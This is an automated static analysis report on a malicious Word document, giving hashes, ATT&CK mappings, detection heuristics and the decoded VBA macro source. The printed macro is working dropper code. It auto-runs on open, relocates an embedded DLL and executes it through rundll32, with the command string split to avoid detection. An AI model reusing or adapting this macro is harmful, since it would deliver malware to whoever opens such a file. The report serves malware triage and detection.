Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ea34b79b2ee2bab3…

MALICIOUS

Office (OLE)

925.0 KB Created: 2021-06-17 07:27:00 Authoring application: Microsoft Office Word First seen: 2021-06-28
MD5: 97d0dc7d56fc1a18157d52afeeeac173 SHA-1: 278d273bb023e53f1288279bad7be3c5e246bbe3 SHA-256: ea34b79b2ee2bab3ff01e738a9886d967d2b1d4e8b65e84b99495dab447b97e8
570 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment

The sample is a malicious Microsoft Office document containing VBA macros. The Document_Open macro is configured to execute automatically, and it references the 'ShellExecuteA' API to run 'rundll32.exe' with arguments that suggest it will load and execute a DLL named 'kikus.dll' from the user's template path. This DLL is likely the second-stage payload, as indicated by the embedded PE executable and ClamAV detection of 'Win.Packed.Midie-10008727-0'.

Heuristics 15

  • Office EPRINT stream contains EMF object high CVE related OLE_EPRINT_EMF_OBJECT
    OLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
  • ClamAV: Win.Packed.Midie-10008727-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Packed.Midie-10008727-0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Ole10Native package carries executable/script file type high OFFICE_PACKAGE_RISKY_FILE
    OLE Package displayName or fullPath ends in an executable or script-capable extension. Even without UI extension spoofing, embedding a runnable payload inside an Office document is a high-risk delivery pattern.
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
       Set vbvcx = CreateObject("Scripting.FileSystemObject")
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECT
    Reference to VirtualProtect API
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2106 bytes
SHA-256: 69e47c1773aef4cb1c60de9dedfff0981c3f84cd531fb1c75d08407dfed31313
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
  Private Declare PtrSafe Function gc Lib "shell32" _
        Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, ByVal lpFile As String, _
        ByVal lpParameters As String, ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long
        Dim hdv As String
Private Sub Document_Open()
Dim vcbc As String
Dim bbbb As String
bbbb = "rundl"
vcbc = Options.DefaultFilePath(wdUserTemplatesPath)

If Dir(vcbc & "\kikus.dll") = "" Then
Call yyy

Call hdhdd
If Len(hdv) > 2 Then

Call nam(hdv)




 Dim cvzz As String
cvzz = "l3" & "2"


  gc 0, vbNullString, _
    bbbb & cvzz, vcbc & "\kikus.dll,GBSLWSDVGOE", _
     vbNullString, 1
End If
End If
End Sub



Sub hdhdd()
Dim usx
usx = Options.DefaultFilePath(wdTempFilePath)

 Dim vbvcx As Object
   Set vbvcx = CreateObject("Scripting.FileSystemObject")
Call Search(vbvcx.GetFolder(usx), hdv)

End Sub

Sub yyy()
  Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
End Sub




Attribute VB_Name = "Module1"
Dim pls As String

Sub nam(pafs As String)
Call ousx
Name pafs As pls & "\kikus.dll"
End Sub



Sub ousx()
pls = Options.DefaultFilePath(wdUserTemplatesPath)
End Sub
 
 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object

  
   For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc
Dim Ters As Object
   For Each Ters In mds.Files
   
   If Ters.Name = "kiks.dll" Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub
embedded_office_0008ec71.exe embedded-pe Office MZ+PE at offset 0x8EC71 362383 bytes
SHA-256: 093f63d8866151d33828118c1681267d9005543a3fb7d34edbc72e0229a63ffa
Detection
ClamAV: Win.Packed.Midie-10008727-0
Obfuscation or payload: likely
Carved macro source contains an auto-exec entry point and execution/download terms.
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1685395118/Ole10Native 327989 bytes
SHA-256: d710e304520b1a7f27206cc5427e6401a8f2ed3093221ca3f2594b482db57b68
ole10native_00_kiks.dll ole-package-payload OLE Ole10Native payload: ObjectPool/_1685395118/Ole10Native; display_name=kiks.dll; full_path=C:\Users\MyPc\AppData\Local\Temp\kiks.dll; temp_path=; def_file= 327680 bytes
SHA-256: 62f2cdb52155cf0ec2f5fa707900eac76a8e58339ce3b0772c53a63a05089127

Open this report in the interactive analyzer, or submit your own file for analysis.